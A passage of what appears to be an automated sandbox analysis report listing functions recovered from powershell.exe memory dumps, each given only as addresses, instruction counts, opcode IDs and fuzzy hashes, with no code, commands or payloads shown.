                                                          Uniqueness Score: -1.00%

                                                          Function 036A2B01 Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a76d42d6b3c4a314e9f9be865390f5eb4bb2a5cfe0499cdddfbabafa801acac
                                                          • Instruction ID: 063ce183cb26021743c0add5e6a1f56ab0bc8776c1a53822eba4b0492c519050
                                                          • Opcode Fuzzy Hash: 7a76d42d6b3c4a314e9f9be865390f5eb4bb2a5cfe0499cdddfbabafa801acac
                                                          • Instruction Fuzzy Hash: 3A4138B4A405059FCB09CF5CC5A89AAFBB1FF48310B158699D816AB364C736FC51CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07E10B80 Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6deb4f742e251f07d95b1d75ef66ed3e4ec0eea1b619b26d68138fc2b68d326
                                                          • Instruction ID: f772093a772a998579cafa2bd1133bf879351ae95abf3b5bfaf335f410e5a992
                                                          • Opcode Fuzzy Hash: b6deb4f742e251f07d95b1d75ef66ed3e4ec0eea1b619b26d68138fc2b68d326
                                                          • Instruction Fuzzy Hash: 1B2147B5700315ABC7289A6A9801B3BB6D6ABC5B15F20C42AE10ACF384DD72DCC1C7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07E10B65 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b28d0b29cb3720f4347730b66e7d2db55b98efbdf223087b46cd04c8712f2e37
                                                          • Instruction ID: a3de1d5f6b1d20cf46af8c4d41a1f4c30d4f3841f12201838c312b7b63cf1cc7
                                                          • Opcode Fuzzy Hash: b28d0b29cb3720f4347730b66e7d2db55b98efbdf223087b46cd04c8712f2e37
                                                          • Instruction Fuzzy Hash: 1821B7B53083856FC7298A7A8815B6B7FD26FC6714F24C41AE048CF3D1CA7698C4C3A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A8B40 Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ecb28a4e675a9e01b5924a2d198bea35783e9aeba7783bf6748edc490b84fa6
                                                          • Instruction ID: 1ad53ef4b1de2ba00d405378a5fc107bace18b81f75a4a89ab1c2f309da2b81e
                                                          • Opcode Fuzzy Hash: 0ecb28a4e675a9e01b5924a2d198bea35783e9aeba7783bf6748edc490b84fa6
                                                          • Instruction Fuzzy Hash: 5421F7B4A006099FCB00CF5DC984AAEFBF5FF48310B148599E859AB355C731EC51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A8258 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 380a6d105c3235527d5989b32ef6e3b70a1b9f3d197e10be822610b8b7373620
                                                          • Instruction ID: c321164955e74b481a7ad82f711119211c463f5a3db30a053689e23db19e6b5f
                                                          • Opcode Fuzzy Hash: 380a6d105c3235527d5989b32ef6e3b70a1b9f3d197e10be822610b8b7373620
                                                          • Instruction Fuzzy Hash: FE212774A046099FCB04CF9DC9849AAFBB5FF4C310B148599E808EB361C735EC51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A9FF7 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1850881c9fa37ea358cb3588e30e92f0d627ff268e5eeb467564eb25d1176b93
                                                          • Instruction ID: a6fe68a16cd617702edf0bf09ad5cb3d5d97950c1e3c67574e79caf6434d2d96
                                                          • Opcode Fuzzy Hash: 1850881c9fa37ea358cb3588e30e92f0d627ff268e5eeb467564eb25d1176b93
                                                          • Instruction Fuzzy Hash: 0D21F8B4A046199FCB05CF9DC5849AAFBB1FF48310B25819AD849EB351C736EC51CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A8B31 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40759334c4bdef6b9569c113ba7a1c1fa83622793fba046e1840f867db98bf72
                                                          • Instruction ID: 368437661cb6a509bca7d3a74783c955e61df38df7969c069b717bfa48a09a1e
                                                          • Opcode Fuzzy Hash: 40759334c4bdef6b9569c113ba7a1c1fa83622793fba046e1840f867db98bf72
                                                          • Instruction Fuzzy Hash: 0221F6B4A006059FCB00CF5DC9809AAFBF5FB49310B158599D459EB361C731EC81CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A8253 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a06db86536208ab156b7dd2623281c0494e5de480912d2f7ba745d9ac03f5378
                                                          • Instruction ID: 36338e2d2cac20dff9081b20021fcfe0b251f7821d3c2b1ed23c9408ed100956
                                                          • Opcode Fuzzy Hash: a06db86536208ab156b7dd2623281c0494e5de480912d2f7ba745d9ac03f5378
                                                          • Instruction Fuzzy Hash: BB21E0B4A0050A9FCB04CF89C9849AAFBB5FB4C310B1485A9E809EB355C731ED91CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A7140 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bfc1a9f418abe683e161cb40b7eb2578bc96d88d4b4eb058cefccb8022f2839
                                                          • Instruction ID: 758f923dd9d23f903c1f6747f58ae5e83d2a29250f611aaa59a87b2dfa23794c
                                                          • Opcode Fuzzy Hash: 7bfc1a9f418abe683e161cb40b7eb2578bc96d88d4b4eb058cefccb8022f2839
                                                          • Instruction Fuzzy Hash: C2213BB4A042599FCB04CF9CC8809AAFBF4FF89300B15859AE455EB352C735ED41CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A7133 Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 468c4f235ee28efa38bef024b37b68afe68393ba7c70c0b1b4c6fb5868cd212c
                                                          • Instruction ID: 862921b7435d21e6ca1800699b3ec511aa315ed670062095fe4b55a06b9f1b35
                                                          • Opcode Fuzzy Hash: 468c4f235ee28efa38bef024b37b68afe68393ba7c70c0b1b4c6fb5868cd212c
                                                          • Instruction Fuzzy Hash: F321EA74A046599FCB00CF9CD9809AABBF5FF49310B158599E849EB352C731ED41CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A8633 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5666d03fb89bd80c7cb8de0866104761d31fa9e7fab779d56dbb1af514d9fa85
                                                          • Instruction ID: c94fa2e9911e8c5773c0d6206fd77217cfae52c3115a95e78a396a9833499afa
                                                          • Opcode Fuzzy Hash: 5666d03fb89bd80c7cb8de0866104761d31fa9e7fab779d56dbb1af514d9fa85
                                                          • Instruction Fuzzy Hash: CD11D274A00209EFDB45CFA8D484A9DFBB2EF88314F298159E404AB365C771AD86CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0363D01D Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759324768.000000000363D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0363D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_363d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f8f21e8d993d6ff4df7aec9edd326eda0fb6e2da6b5cc13fbd360b20a8ca1371
                                                          • Instruction ID: cafd49de21cd9518d18acb9a02c94be5ff67c7865a13dbf4f82e01ff655ab652
                                                          • Opcode Fuzzy Hash: f8f21e8d993d6ff4df7aec9edd326eda0fb6e2da6b5cc13fbd360b20a8ca1371
                                                          • Instruction Fuzzy Hash: BD01F7314083409AE710CE25CE84BA7FF98DF42724F0CC569ED580A246C3799882C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0363D007 Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759324768.000000000363D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0363D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_363d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc5bbb930918cf13f808bb67685e113e473aa2d9e8b8e6679044770a6554fdda
                                                          • Instruction ID: 028c89b14e7eed88d41441c5e8744d983928dec1e6db3dba0abb902e063565b2
                                                          • Opcode Fuzzy Hash: fc5bbb930918cf13f808bb67685e113e473aa2d9e8b8e6679044770a6554fdda
                                                          • Instruction Fuzzy Hash: 6701407240E3C09ED7128B25C994B52BFB4EF43624F1D81CBD9888F2A3C2699849C772
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036AB2E2 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5967c1052c7e7d159b94dfc3ea47a5c2edafc4548745a4a19a9090f503bee91f
                                                          • Instruction ID: 351c8f7e5ba52460c857718c62123da21d168a2c7f10cbe9ba9989cafde7475f
                                                          • Opcode Fuzzy Hash: 5967c1052c7e7d159b94dfc3ea47a5c2edafc4548745a4a19a9090f503bee91f
                                                          • Instruction Fuzzy Hash: E3F015B1D0928A9FCB44DFB994421AEBFF1AA08200F1044AFD899E3300EA354640CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036AB2F0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a91a9402f16eeed70f6b1d8c64157d8eadda08b6b11a947ea98c5bf548df6853
                                                          • Instruction ID: 99a81b0361ec5931cf4f093504978774b48902603b0c68c7e1ba2227c9075535
                                                          • Opcode Fuzzy Hash: a91a9402f16eeed70f6b1d8c64157d8eadda08b6b11a947ea98c5bf548df6853
                                                          • Instruction Fuzzy Hash: D0E026B4D1420E9F8F48DFB995421BEFBF5AB48200F10856E9819E3340E6755A518F95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036AB2B1 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 938c6bc000ed88cbef9d2dcce3e7aa84ae16185795a973e36e5231d99329420c
                                                          • Instruction ID: 1c13bb7728ee275289936013b379aab10f75b99cc24389b099d9e62b26f5d636
                                                          • Opcode Fuzzy Hash: 938c6bc000ed88cbef9d2dcce3e7aa84ae16185795a973e36e5231d99329420c
                                                          • Instruction Fuzzy Hash: 9FD05EB10183805FE7465664F9283E43FA2AB03601B050087D1909A652C24B09118B65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 07E11E50 Relevance: 7.7, Strings: 6, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                          • API String ID: 0-2392861976
                                                          • Opcode ID: 03cfb6566fffa88d5ee57d2367eae754c09f815ec05dc425804762c19151cb40
                                                          • Instruction ID: 9361b527d1622783ee41cb4ffefecdca756beb37f04ed55937a46dbc44234179
                                                          • Opcode Fuzzy Hash: 03cfb6566fffa88d5ee57d2367eae754c09f815ec05dc425804762c19151cb40
                                                          • Instruction Fuzzy Hash: 9E519EB1B0534E9FCB258E6998015AABFE5BFC6114B1884BFD645CF352DB32C888C361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07E11E31 Relevance: 5.1, Strings: 4, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q$$^q$$^q$$^q
                                                          • API String ID: 0-2125118731
                                                          • Opcode ID: 42b00fad6cb760b8e8e9f350d888e0cb6df4c04a9176da771469530dc8b1f00b
                                                          • Instruction ID: 4eb4ce6f6c24a8cb1a10d63e1cc422f9c7d4807d806b97f649813fc6708cae49
                                                          • Opcode Fuzzy Hash: 42b00fad6cb760b8e8e9f350d888e0cb6df4c04a9176da771469530dc8b1f00b
                                                          • Instruction Fuzzy Hash: E12137F190A38E9FCF258F65C4026A9BFF4AF47154F18A1ABC644CB152E73185C4C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07E10441 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q$$^q$$^q
                                                          • API String ID: 0-2049395529
                                                          • Opcode ID: e1d79fced2f7cd3e7ecc5a4ecf1f8d0377514d1d8910f273d03814774708fc69
                                                          • Instruction ID: c6d6dee51569ff28eda92ee599e77bca9f0c8c84c4019a289442e735677c1019
                                                          • Opcode Fuzzy Hash: e1d79fced2f7cd3e7ecc5a4ecf1f8d0377514d1d8910f273d03814774708fc69
                                                          • Instruction Fuzzy Hash: A401A271B0A3D54FC72B122919646A56FB65FC392032A04EBC091CF397CD1A4CCA83B3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 02F229F0 Relevance: .3, Instructions: 254COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1785535244.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_2f20000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dc0e9b3c813709b034c6e1a3786c39d602cbce9c2abfe32f0b5bf988b22189b2
                                                          • Instruction ID: 4e442e1b93d12c15767993159d9a391aa99210dd77b16c3fc7d93b3c5aeac544
                                                          • Opcode Fuzzy Hash: dc0e9b3c813709b034c6e1a3786c39d602cbce9c2abfe32f0b5bf988b22189b2
                                                          • Instruction Fuzzy Hash: FEA1BEB0A002158FCB15CF59C8849AEFBB1FF89320B248669D915AB365C736FD55CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02F22B00 Relevance: .1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1785535244.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_2f20000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07d95407d5ba684a4a453a40405c46f1a885384db26a3287faec1ca4122d45c5
                                                          • Instruction ID: 22ac618ca69722abdff932209d689640752c1cb2a4c81d75b454b62841b2726a
                                                          • Opcode Fuzzy Hash: 07d95407d5ba684a4a453a40405c46f1a885384db26a3287faec1ca4122d45c5
                                                          • Instruction Fuzzy Hash: F04158B0A002159FCB09CF58C598AAEFBB1FF49310B1182A9D915AB364C736FC51CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02F230F0 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1785535244.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_2f20000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e34b9a5ea3cead52f8df24a7dbfb574d6ca33dccc0e581383684bc581064c25
                                                          • Instruction ID: a80f7d94aba1d47cd0d161bcb3915bf62d3ed27bc08fe908f7f935cdcddc2e09
                                                          • Opcode Fuzzy Hash: 0e34b9a5ea3cead52f8df24a7dbfb574d6ca33dccc0e581383684bc581064c25
                                                          • Instruction Fuzzy Hash: DD31AEB1E002289FCB01CF98C8909AAFBF1FF49310B158196E508EB366C335ED45CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02F23110 Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1785535244.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_2f20000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40f00135d08dbf439d9e6354d31aae4699820726694494ab417bdf4be36622a0
                                                          • Instruction ID: 0172b34805be5717e753b7627b30ab6bd04a31d3bdbac6bfc45f781331bb049f
                                                          • Opcode Fuzzy Hash: 40f00135d08dbf439d9e6354d31aae4699820726694494ab417bdf4be36622a0
                                                          • Instruction Fuzzy Hash: 27212AB4E042199FCB04CF59C8809AAFBF1FF49310B158599E919EB366C735EC45CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02CAD005 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1783505958.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_2cad000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a173a66082ca1071dcf110d830f31361f44d4128510459804c1d3529b328a2e
                                                          • Instruction ID: 775e437672bdd345faf8ad59bf48bef734e3af1674e4895a33bd7ab719648772
                                                          • Opcode Fuzzy Hash: 0a173a66082ca1071dcf110d830f31361f44d4128510459804c1d3529b328a2e
                                                          • Instruction Fuzzy Hash: 1501526100E3C05ED7128B358C94756BFB4EF53628F1DC5DBD9888F5A3C2695849C7B2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02CAD01D Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1783505958.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_2cad000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34c4e3096bf895894cae038467598a286c7295bbd969662ca4c6d108dd22fea1
                                                          • Instruction ID: 2745dccc8200e76e0a2967951220ef2b6cc15ef5d646edaac3e0077b947dac0e
                                                          • Opcode Fuzzy Hash: 34c4e3096bf895894cae038467598a286c7295bbd969662ca4c6d108dd22fea1
                                                          • Instruction Fuzzy Hash: 92012B710083419EE7104A2ACDC4767BFD8EF81728F08C529ED4A0B646C779D981C6F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%